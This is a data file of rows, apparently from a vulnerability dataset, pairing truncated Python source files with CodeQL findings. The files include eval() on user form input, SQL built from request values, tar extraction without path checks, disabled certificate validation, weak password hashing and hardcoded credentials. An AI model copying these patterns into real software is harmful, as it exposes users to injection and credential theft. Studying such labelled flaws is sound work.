75bdf69a195f15b9e4a54e4cc90d4886220c8943
3
{ "blob_id": "75bdf69a195f15b9e4a54e4cc90d4886220c8943", "branch_name": "refs/heads/master", "committer_date": 1345151317000, "content_id": "69c21c2aee81c2d443daba702bc327cf04c7c971", "detected_licenses": [ "Apache-2.0" ], "directory_id": "9413df86fca5302cf43a032510577e23b345cd1c", "extension": "py"...
2.796875
stackv2
"""Kazoo Security This modules includes helper functions to create digest ACL's appropriate for use with Zookeeper. """ import hashlib import zookeeper __all__ = ("make_digest_acl", ) def make_digest_acl_credential(username, password): """Create a SHA1 digest credential""" credential = "%s:%s" % (usernam...
59
29.41
77
14
394
python
[{"finding_id": "codeql_py/weak-sensitive-data-hashing_a47e30a248551112_626e2452", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is inse...
1
true
[ "CWE-327" ]
[ "py/weak-sensitive-data-hashing" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expen...
[ 18 ]
[ null ]
[ 30 ]
[ 40 ]
2024-11-18T21:10:28.511838+00:00
1,683,905,939,000
36b7337fffc4222915ddb3702757e990404e27c6
3
{ "blob_id": "36b7337fffc4222915ddb3702757e990404e27c6", "branch_name": "refs/heads/master", "committer_date": 1683905939000, "content_id": "f27ad3691962cf9a1e9d8dae6870200c08f19549", "detected_licenses": [ "MIT" ], "directory_id": "61dd0f6a64813c231ce863dbcfc6d32210e99969", "extension": "py", "fi...
3.171875
stackv2
#!/usr/bin/env python3 """ Passchek is a simple cli tool, checks if your password has been compromised. This tool utilizes the k-anonymity algorithm to query Troy Hunt's pwnedpassword API for password breaches. MIT License Developed by @edyatl <edyatl@yandex.ru> March 2023 https://github.com/edyatl """ import os im...
213
27.87
105
22
1,470
python
[{"finding_id": "codeql_py/weak-sensitive-data-hashing_2efbd0fad36f7f6f_35a6f51c", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is inse...
1
true
[ "CWE-327" ]
[ "py/weak-sensitive-data-hashing" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Sensitive data (password)](1) is used in a hashing algorithm (SHA1) that is insecure for password hashing, since it is not a computationally expensive hash function." ]
[ 53 ]
[ null ]
[ 30 ]
[ 53 ]
2024-11-18T21:10:32.214643+00:00
1,425,052,821,000
d80535d161daabadafeda0bfdb5501cddaba9bc6
3
{ "blob_id": "d80535d161daabadafeda0bfdb5501cddaba9bc6", "branch_name": "refs/heads/master", "committer_date": 1425052821000, "content_id": "c0aed6399f3b086d843b2b43142fb2b4045c4520", "detected_licenses": [ "CC0-1.0" ], "directory_id": "26709045e36fd6af7216f4cb7bea3ce4a58b5c32", "extension": "py", ...
2.53125
stackv2
"""This modules sends summary emails. """ from __future__ import print_function import os import time import datetime import smtplib from getpass import getpass from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from report import report from lawyer import rules TEXT = """ Current Co...
80
21.11
80
13
489
python
[{"finding_id": "codeql_py/clear-text-storage-sensitive-data_6a38045c0bc260d7_344475cb", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."...
1
true
[ "CWE-312" ]
[ "py/clear-text-storage-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression stores [sensitive data (password)](1) as clear text." ]
[ 47 ]
[ null ]
[ 21 ]
[ 23 ]
2024-11-18T21:10:34.399965+00:00
1,571,316,812,000
b45df19873f5c972e2417f1b9090c8a6ec673d24
3
{ "blob_id": "b45df19873f5c972e2417f1b9090c8a6ec673d24", "branch_name": "refs/heads/master", "committer_date": 1571316812000, "content_id": "8a048e641b52bb957cd28a1f93d31efe46944100", "detected_licenses": [ "Apache-2.0" ], "directory_id": "5d50271f46aaa83871ec82241f25189d46b76238", "extension": "py"...
2.75
stackv2
# coding=utf-8 import requests,flask,json from bs4 import BeautifulSoup class SpamInfo(object): def __init__(self): self.is_mark = False self.mark_info = '' self.mark_topone = '' self.danger_levels = '' class SpiderNumber(object): def __init__(self): self.target = 'ht...
68
29.59
155
18
566
python
[{"finding_id": "codeql_py/partial-ssrf_d3ef76be6da35c51_9df8597d", "tool_name": "codeql", "rule_id": "py/partial-ssrf", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "Part of the URL of this request depends on a [user-provided value](1).", "remediation": "", "location": {"fil...
1
true
[ "CWE-918" ]
[ "py/partial-ssrf" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Part of the URL of this request depends on a [user-provided value](1)." ]
[ 24 ]
[ null ]
[ 15 ]
[ 75 ]
2024-11-18T21:10:38.031322+00:00
1,634,741,999,000
0c4ee0ef5688c413bf47b1d7d4ba283a7dcb31c7
3
{ "blob_id": "0c4ee0ef5688c413bf47b1d7d4ba283a7dcb31c7", "branch_name": "refs/heads/master", "committer_date": 1634741999000, "content_id": "13370b6a6b6cdf355df82550839b99b7b793741d", "detected_licenses": [ "MIT" ], "directory_id": "4e65bf926f582394f00c0196f545a8a7104e287a", "extension": "py", "fi...
2.8125
stackv2
from flask import Flask,render_template,request app = Flask(__name__) @app.route('/') def hello_world(): return render_template('index.html') @app.route('/evaluate', methods=['POST', 'GET']) def evaluate(): rawExpr = request.form['mathexpression'] mathExpr = str(rawExpr) try: ans = eval(mathExp...
20
25.25
94
12
119
python
[{"finding_id": "codeql_py/code-injection_457250fb8ede623c_b01896c6", "tool_name": "codeql", "rule_id": "py/code-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This code execution depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "...
1
true
[ "CWE-094" ]
[ "py/code-injection" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This code execution depends on a [user-provided value](1)." ]
[ 14 ]
[ null ]
[ 20 ]
[ 28 ]
2024-11-18T21:37:23.173151+00:00
1,605,972,737,000
ea2b0fd56af1815a2fd3469ecf455b99a68edc8f
3
{ "blob_id": "ea2b0fd56af1815a2fd3469ecf455b99a68edc8f", "branch_name": "refs/heads/main", "committer_date": 1605972737000, "content_id": "e8e566c3a0b7eb706562b5344d8908de5bb8b5d9", "detected_licenses": [ "MIT" ], "directory_id": "df9afb7b1722cbfd415b0f5a356888cc00df7b4c", "extension": "py", "file...
3.390625
stackv2
import hashlib import subprocess import pyAesCrypt import sys if len(sys.argv) <= 2: print("\nLet's encrypt or decrypt your file.\n") print("Usage : python3 crypt.py <encrypt/decrypt> <filename>") else: choose = sys.argv[1] directory = sys.argv[2] password = input("Enter key: ") hash = hashlib...
32
30.91
92
14
249
python
[{"finding_id": "codeql_py/weak-sensitive-data-hashing_d5b0bbb646d1720b_d031dc4b", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insec...
1
true
[ "CWE-327" ]
[ "py/weak-sensitive-data-hashing" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function." ]
[ 15 ]
[ null ]
[ 17 ]
[ 34 ]
2024-11-18T21:37:25.663576+00:00
1,692,129,357,000
d6972f10316cad03e725e9f72cd7e56522cd4cc8
2
{ "blob_id": "d6972f10316cad03e725e9f72cd7e56522cd4cc8", "branch_name": "refs/heads/master", "committer_date": 1692129357000, "content_id": "489aa236ab27873d79218abef27361b6eb2f24c5", "detected_licenses": [ "MIT" ], "directory_id": "24eaa385ce4d173d913ac01c9f03770f8802eea7", "extension": "py", "fi...
2.5
stackv2
# -*- coding: utf-8 -*- """ Adapted from Yelp Fusion API code sample. Please refer to http://www.yelp.com/developers/v3/documentation for the API documentation. """ from __future__ import print_function from __future__ import absolute_import import argparse import json import pprint import requests import sys import...
269
34.48
115
19
2,250
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_887b5f71b9b65594_f1ded96b", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT...
8
true
[ "CWE-312", "CWE-312", "CWE-295", "CWE-295", "CWE-295", "CWE-295", "CWE-295", "CWE-295" ]
[ "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data", "py/request-without-cert-validation", "py/request-without-cert-validation", "py/request-without-cert-validation", "py/request-without-cert-validation", "py/request-without-cert-validation", "py/request-without-cert-validat...
[ "HIGH", "HIGH", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.\nThis expression logs [sensitive data (password)](3) as clear text.\nThis expression logs [sensitive data (password)](4) as clear text.", "This expression logs [sensitive data (p...
[ 90, 62, 91, 154, 194, 200, 209, 215 ]
[ null, null, null, null, null, null, null, null ]
[ 75, 44, 16, 13, 12, 16, 20, 24 ]
[ 82, 56, 94, 50, 52, 57, 51, 59 ]
2024-11-18T21:37:36.170573+00:00
1,596,689,624,000
340c5016fa275c45bc827ded684d07e948e8e12c
2
{ "blob_id": "340c5016fa275c45bc827ded684d07e948e8e12c", "branch_name": "refs/heads/master", "committer_date": 1596689624000, "content_id": "89d71545c878c4f06fa570c59c76bfa80964c28a", "detected_licenses": [ "MIT" ], "directory_id": "83c1654e74397a11345cf85270a3b1164b0d8db6", "extension": "py", "fi...
2.421875
stackv2
from web3 import Web3 import flask from flask import request, jsonify import json from flask_cors import CORS from datetime import datetime app = flask.Flask(__name__) app.config["DEBUG"] = True CORS(app) ganache_url = "http://127.0.0.1:7545" web3 = Web3(Web3.HTTPProvider(ganache_url)) BASE = "http://169.231.102....
271
34.42
160
18
2,540
python
[{"finding_id": "codeql_py/path-injection_f9a176d561f679f5_b6ad3c1f", "tool_name": "codeql", "rule_id": "py/path-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This path depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "unknown", ...
1
true
[ "CWE-022" ]
[ "py/path-injection" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This path depends on a [user-provided value](1)." ]
[ 142 ]
[ null ]
[ 19 ]
[ 46 ]
2024-11-18T21:59:11.651866+00:00
1,668,642,529,000
4b25a4515def27be9fb141ac329afef454c5fcda
3
{ "blob_id": "4b25a4515def27be9fb141ac329afef454c5fcda", "branch_name": "refs/heads/master", "committer_date": 1668642529000, "content_id": "8397eb367bf92b44613349448405f8f22ce5eb67", "detected_licenses": [ "Apache-2.0" ], "directory_id": "35497e9f193dd47189d122a832972bf6271c7f6e", "extension": "py"...
2.53125
stackv2
""" Main file from which BaseStation Websocket interface begins. """ from flask import Flask from flask import Blueprint, request, render_template, jsonify, session, redirect from flask_api import status import os.path import json import sys import time import datetime # Minibot imports. from .basestation_init import...
384
33.78
140
21
3,063
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_0aa3f06792e478e1_6b7ae5e6", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text." ]
[ 226 ]
[ null ]
[ 23 ]
[ 31 ]
2024-11-18T21:59:12.270132+00:00
1,689,200,951,000
2d8be41f480de1dde1eaf808502604470a739fdd
3
{ "blob_id": "2d8be41f480de1dde1eaf808502604470a739fdd", "branch_name": "refs/heads/main", "committer_date": 1689200951000, "content_id": "c97128440114c7505995786b1e0b23d5275b1194", "detected_licenses": [ "Apache-2.0" ], "directory_id": "5e24a177efa11fc9f9e77da1413085e4d16a77df", "extension": "py", ...
2.609375
stackv2
# # Copyright 2020, by the California Institute of Technology. ALL RIGHTS # RESERVED. United States Government Sponsorship acknowledged. Any commercial # use must be negotiated with the Office of Technology Transfer at the # California Institute of Technology. # """ ====================== transaction_on_disk.py ==...
189
38.02
106
21
1,418
python
[{"finding_id": "codeql_py/overly-permissive-file_7979a8b26197b40a_c83cad81", "tool_name": "codeql", "rule_id": "py/overly-permissive-file", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Overly permissive mask in chmod sets file to world readable.", "remediation": "", "location": ...
2
true
[ "CWE-732", "CWE-732" ]
[ "py/overly-permissive-file", "py/overly-permissive-file" ]
[ "MEDIUM", "MEDIUM" ]
[ "MEDIUM", "MEDIUM" ]
[ "Overly permissive mask in chmod sets file to world readable.", "Overly permissive mask in chmod sets file to world readable." ]
[ 173, 184 ]
[ null, null ]
[ 17, 13 ]
[ 50, 47 ]
2024-11-18T21:59:17.220074+00:00
1,531,494,835,000
eb6e5c902a1a57213d347ed0c39f894f652c3113
2
{ "blob_id": "eb6e5c902a1a57213d347ed0c39f894f652c3113", "branch_name": "refs/heads/master", "committer_date": 1531494835000, "content_id": "3420953be97620640d07400381219167d10ba82b", "detected_licenses": [ "MIT" ], "directory_id": "90f8bad95309ae43c5a5e1acca39afe8388fa3e5", "extension": "py", "fi...
2.4375
stackv2
"""Module containing API endpoints.""" from . import api from flask import make_response, jsonify, request, abort, current_app from flask_httpauth import HTTPBasicAuth from werkzeug.utils import secure_filename import logging from logging.handlers import RotatingFileHandler from time import strftime import traceback...
327
33.56
79
19
2,327
python
[{"finding_id": "codeql_py/log-injection_0af38bba1702a664_fd466190", "tool_name": "codeql", "rule_id": "py/log-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This log entry depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "unkno...
9
true
[ "CWE-117", "CWE-117", "CWE-117", "CWE-117", "CWE-117", "CWE-117", "CWE-117", "CWE-117", "CWE-117" ]
[ "py/log-injection", "py/log-injection", "py/log-injection", "py/log-injection", "py/log-injection", "py/log-injection", "py/log-injection", "py/log-injection", "py/log-injection" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "This log entry depends on a [user-provided value](1).", "This log entry depends on a [user-provided value](1).", "This log entry depends on a [user-provided value](1).", "This log entry depends on a [user-provided value](1).", "This log entry depends on a [user-provided value](1).", "This log entry depen...
[ 250, 251, 252, 253, 254, 284, 285, 287, 301 ]
[ null, null, null, null, null, null, null, null, null ]
[ 18, 18, 18, 18, 18, 18, 18, 18, 22 ]
[ 37, 32, 35, 56, 36, 37, 32, 35, 41 ]
2024-11-18T22:11:24.659386+00:00
1,590,787,108,000
918d999fa99319c07d072c87e1310a0b26a91b94
3
{ "blob_id": "918d999fa99319c07d072c87e1310a0b26a91b94", "branch_name": "refs/heads/master", "committer_date": 1590787108000, "content_id": "6476ebe3fbea3eef5907dbb796df9cafbf4e219b", "detected_licenses": [ "MIT" ], "directory_id": "746d056d8cc3fe9e69828936485439f5bf90eb05", "extension": "py", "fi...
2.53125
stackv2
# I think it was easier to get the rpg data uploaded to MongoDB import os import sqlite3 import pymongo from dotenv import load_dotenv load_dotenv() # connect to sqlite DB_FILEPATH = os.path.join(os.path.dirname(__file__), ".." , "module1-introduction-to-sql", "rpg_db.sqlite3") connection = sqlite3.connect(DB_FILEPA...
190
25.16
117
11
1,235
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_10c616e18c4b7045_d6c8c5fe", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text." ]
[ 27 ]
[ null ]
[ 15 ]
[ 29 ]
2024-11-18T22:11:43.321317+00:00
1,620,967,617,000
524f844e46f8b520addf6a951737e3524e3915c9
3
{ "blob_id": "524f844e46f8b520addf6a951737e3524e3915c9", "branch_name": "refs/heads/main", "committer_date": 1620967617000, "content_id": "82bce4eb2308e86e0f63fb19f93fcb4246380510", "detected_licenses": [ "MIT" ], "directory_id": "d7d033ef9686ae782bfda5e1d8ca63d8e3f0dcd2", "extension": "py", "file...
2.703125
stackv2
from kafka import KafkaConsumer from pathlib import Path from requests import post, exceptions, put from requests.auth import HTTPBasicAuth from logger import log import tensorflow as tf import pandas as pd import json import os HOME_SERVICE_AUTH = HTTPBasicAuth('model-builder', 'secret') MODELS_BASE_PATH = '/models' ...
193
39.08
115
17
1,642
python
[{"finding_id": "codeql_py/request-without-cert-validation_97db9323622be33f_e040ba1c", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]...
1
true
[ "CWE-295" ]
[ "py/request-without-cert-validation" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "This request may run without certificate validation because [it is disabled](1)." ]
[ 176 ]
[ null ]
[ 17 ]
[ 111 ]
2024-11-18T22:24:01.317085+00:00
1,690,547,806,000
d2cabe2909083e880e070b5c9d8c301ee1a18a5c
2
{ "blob_id": "d2cabe2909083e880e070b5c9d8c301ee1a18a5c", "branch_name": "refs/heads/master", "committer_date": 1690547806000, "content_id": "ca4605d7a290b8ffb078a791978c1e00b60882fc", "detected_licenses": [ "MIT" ], "directory_id": "34b0938b1946404bf184da8d206f4c297b6f2158", "extension": "py", "fi...
2.4375
stackv2
import sys import re from .bot import BotError, BotCommand, Bot from .models import Subscription, Node, NodeType from .settings import translation _ = translation.gettext MSG_INCORRECT_COMMAND=_('Incorrect command. Use /help for the list of commands.') MSG_OK = _('Ok.') def _parse_node_id(string): m = re.matc...
271
29.29
123
21
1,820
python
[{"finding_id": "codeql_py/incomplete-hostname-regexp_bf64cfbce0f01430_da0ab78e", "tool_name": "codeql", "rule_id": "py/incomplete-hostname-regexp", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This regular expression has an unescaped '.' before 'tkg.org', so it might match more ho...
1
true
[ "CWE-020" ]
[ "py/incomplete-hostname-regexp" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This regular expression has an unescaped '.' before 'tkg.org', so it might match more hosts than expected." ]
[ 16 ]
[ null ]
[ 22 ]
[ 57 ]
2024-11-18T22:24:05.074533+00:00
1,519,265,696,000
fbeb38d25031185adb91a07754593fca87f47c09
3
{ "blob_id": "fbeb38d25031185adb91a07754593fca87f47c09", "branch_name": "refs/heads/master", "committer_date": 1519265696000, "content_id": "c78a99a0e95cc55e48f7e036a3e9c375328e6210", "detected_licenses": [ "MIT" ], "directory_id": "316bbd89fbb36af7159fc2729b599436423ae193", "extension": "py", "fi...
2.796875
stackv2
import jinja2 import re from sys import stderr from itertools import count from html import unescape as html_unescape jin_env = jinja2.Environment(loader=jinja2.PackageLoader('generator', 'templates'), autoescape=False) def indent_lines(lines, shift=4): if isinstance(lines, str): lines = lines.split('\n...
80
23.11
101
19
499
python
[{"finding_id": "codeql_py/jinja2/autoescape-false_eb9bf1984e45e0ea_d4f3cdc5", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati...
1
true
[ "CWE-079" ]
[ "py/jinja2/autoescape-false" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Using jinja2 templates with autoescape=False can potentially allow XSS attacks." ]
[ 8 ]
[ null ]
[ 11 ]
[ 102 ]
2024-11-18T22:36:28.865031+00:00
1,542,998,953,000
c23b42617448c93d80480190c835d437005f01b4
2
{ "blob_id": "c23b42617448c93d80480190c835d437005f01b4", "branch_name": "refs/heads/master", "committer_date": 1542998953000, "content_id": "7f37c76b29a2d1518e0ff22286f03e725d2de132", "detected_licenses": [ "MIT" ], "directory_id": "db8e8ed6cf3a236f3b142745bc3b0aeb5e33a960", "extension": "py", "fi...
2.359375
stackv2
# (C) Copyright 2018 Hewlett Packard Enterprise Development LP. import requests sessionid = requests.Session() import json import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) from Crypto.Cipher import XOR import base64 from sqlalchemy import * engine=create_engine('mysql://aruba:Arub...
152
39.44
140
16
1,391
python
[{"finding_id": "codeql_py/request-without-cert-validation_16d35bc13413c553_09de24dc", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]...
5
true
[ "CWE-295", "CWE-295", "CWE-295", "CWE-295", "CWE-295" ]
[ "py/request-without-cert-validation", "py/request-without-cert-validation", "py/request-without-cert-validation", "py/request-without-cert-validation", "py/request-without-cert-validation" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "This request may run without certificate validation because [it is disabled](1).", "This request may run without certificate validation because [it is disabled](1).", "This request may run without certificate validation because [it is disabled](1).", "This request may run without certificate validation becau...
[ 21, 28, 36, 78, 110 ]
[ null, null, null, null, null ]
[ 20, 20, 20, 22, 22 ]
[ 94, 64, 112, 74, 93 ]
2024-11-18T22:36:42.921526+00:00
1,587,976,432,000
9c5e0dcdbca6d050257f024d49e5879df2d4e006
3
{ "blob_id": "9c5e0dcdbca6d050257f024d49e5879df2d4e006", "branch_name": "refs/heads/master", "committer_date": 1587976432000, "content_id": "c8d4aa3f1579c73ca3987daca15c6044b10c74a0", "detected_licenses": [ "MIT" ], "directory_id": "699d22eb5f54fc2821f47d899278d52e2052a0e0", "extension": "py", "fi...
2.671875
stackv2
import requests, configparser, base64, os, urllib.parse, re, traceback if not os.path.exists('女优头像'): print('“女优头像”文件夹丢失!请把它放进exe的文件夹中!\n') os.system('pause') # 读取配置文件,这个ini文件用来给用户设置重命名的格式和jav网址 config_settings = configparser.RawConfigParser() print('正在读取ini中的设置...', end='') try: config_settings.read('ini...
76
35.46
92
17
799
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_88988387d5bcdbfe_61b749d5", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
2
true
[ "CWE-312", "CWE-312" ]
[ "py/clear-text-logging-sensitive-data", "py/clear-text-logging-sensitive-data" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text.", "This expression logs [sensitive data (password)](1) as clear text." ]
[ 41, 43 ]
[ null, null ]
[ 46, 23 ]
[ 54, 32 ]
2024-11-18T20:23:12.559434+00:00
1,638,261,643,000
89817f65771bdf2c1a4de9288c8dc96329c536e4
3
{ "blob_id": "89817f65771bdf2c1a4de9288c8dc96329c536e4", "branch_name": "refs/heads/master", "committer_date": 1638261643000, "content_id": "c696d714a69bc764bb49d752e9942eb2fdc7a603", "detected_licenses": [ "MIT" ], "directory_id": "d30011ebb5c273f35fab76b1ae92c67461b61114", "extension": "py", "fi...
2.625
stackv2
import os from jinja2 import Environment, FileSystemLoader import json import yaml import pdfkit from datetime import datetime import argparse import re # Resume + Template Constants CUSTOM_DATE_FORMAT = "%b %Y" PATH_CAREER_CUP_DIRECTORY = "CareerCup" PATH_CAREER_CUP_TEMPLATE = r"CareerCup/careerCupTemplate.html" # ...
61
28.9
88
16
409
python
[{"finding_id": "codeql_py/jinja2/autoescape-false_94e8b259cb369887_d9f9fbf7", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati...
1
true
[ "CWE-079" ]
[ "py/jinja2/autoescape-false" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Using jinja2 templates with autoescape=False can potentially allow XSS attacks." ]
[ 32 ]
[ 36 ]
[ 37 ]
[ 10 ]
2024-11-18T20:23:15.121060+00:00
1,577,449,767,000
0d9c1127c1397ba8b15f1a12f8f54c598afc5609
3
{ "blob_id": "0d9c1127c1397ba8b15f1a12f8f54c598afc5609", "branch_name": "refs/heads/master", "committer_date": 1577449767000, "content_id": "101e1b10989b88d1d2f45aababc06995a5c6640b", "detected_licenses": [ "MIT" ], "directory_id": "54677e5558302f688ddc989bccd03b44642e039b", "extension": "py", "fi...
2.640625
stackv2
from flask import Flask, jsonify, request import mysql.connector import datetime conn = mysql.connector.connect(user="root", password="0000", host="localhost", port="3307", database="question") n...
64
28.36
115
14
440
python
[{"finding_id": "codeql_py/sql-injection_fb045dfa1208e224_064f89bd", "tool_name": "codeql", "rule_id": "py/sql-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This SQL query depends on a [user-provided value](1).\nThis SQL query depends on a [user-provided value](2)."...
1
true
[ "CWE-089" ]
[ "py/sql-injection" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This SQL query depends on a [user-provided value](1).\nThis SQL query depends on a [user-provided value](2)." ]
[ 56 ]
[ null ]
[ 20 ]
[ 76 ]
2024-11-18T20:23:26.815962+00:00
1,510,187,125,000
a34502a01b8beeeb97f2c625c27d420fb9f2b2fa
3
{ "blob_id": "a34502a01b8beeeb97f2c625c27d420fb9f2b2fa", "branch_name": "refs/heads/master", "committer_date": 1510187125000, "content_id": "9f0b69bed6dc322927c7198e1c77c559a9d95299", "detected_licenses": [ "MIT" ], "directory_id": "8f69e928d6112a6288598999aabf00fdb27bbb4b", "extension": "py", "fi...
3.171875
stackv2
import sys import string if len(sys.argv) != 2: sys.exit() def cubemap(digits): if len(digits) != 3: raise IndexError if not digits.isnumeric(): raise ValueError a=int(digits[0])-1 b=int(digits[1])-1 c=int(digits[2])-1 if a < 0 or a > 5 or b < 0 or b > 5 or c < 0 or c > 5: raise OverflowError return a*3...
30
20.23
89
14
202
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_b6da8c64a8c8abc6_0b898ff2", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text." ]
[ 30 ]
[ null ]
[ 18 ]
[ 37 ]
2024-11-18T20:23:36.591619+00:00
1,479,783,978,000
496ca0e6cac84749e10b5f9b4d372c3560388785
4
{ "blob_id": "496ca0e6cac84749e10b5f9b4d372c3560388785", "branch_name": "refs/heads/master", "committer_date": 1479783978000, "content_id": "3d23b46eb543eef03fee3e73dc0e070fb6cd838a", "detected_licenses": [ "MIT" ], "directory_id": "c3eb7ab0eb26d47c282d82d3b86ef3f309d3edcd", "extension": "py", "fi...
3.640625
stackv2
from collections import defaultdict import re ''' You're running a pool of servers where the servers are numbered sequentially starting from 1. Over time, any given server might explode, in which case its server number is made available for reuse. When a new server is launched, it should be given the lowest available ...
85
27.45
78
12
615
python
[{"finding_id": "codeql_py/overly-large-range_dcbc0b2e0ae43756_d3a7d512", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\].", "remediation": "", "lo...
1
true
[ "CWE-020" ]
[ "py/overly-large-range" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "Suspicious character range that is equivalent to \\[A-Z\\\\[\\\\\\\\]^_`a-z\\]." ]
[ 73 ]
[ null ]
[ 39 ]
[ 42 ]
2024-11-18T20:23:37.024627+00:00
1,612,163,609,000
e485c6d8bb227e25286c107f81b114ef1abbb2be
3
{ "blob_id": "e485c6d8bb227e25286c107f81b114ef1abbb2be", "branch_name": "refs/heads/master", "committer_date": 1612163609000, "content_id": "4b23c638a080dd56a0b897c91a3db14c2856efde", "detected_licenses": [ "MIT" ], "directory_id": "a582b97166a73b9b287700d54fe1a569211ad9c9", "extension": "py", "fi...
2.796875
stackv2
import os import shutil import urllib import zipfile import tarfile from tqdm import tqdm class LambdaLR: def __init__(self, n_epoch, offset, total_batch_size, decay_batch_size): self.n_epoch = n_epoch self.offset = offset self.total_batch_size = total_batch_size self.decay_batch_...
62
28.05
103
18
429
python
[{"finding_id": "codeql_py/tarslip_9e09eee8babc21c2_6f5bbe0c", "tool_name": "codeql", "rule_id": "py/tarslip", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This file extraction depends on a [potentially untrusted source](1).", "remediation": "", "location": {"file_path": "un...
1
true
[ "CWE-022" ]
[ "py/tarslip" ]
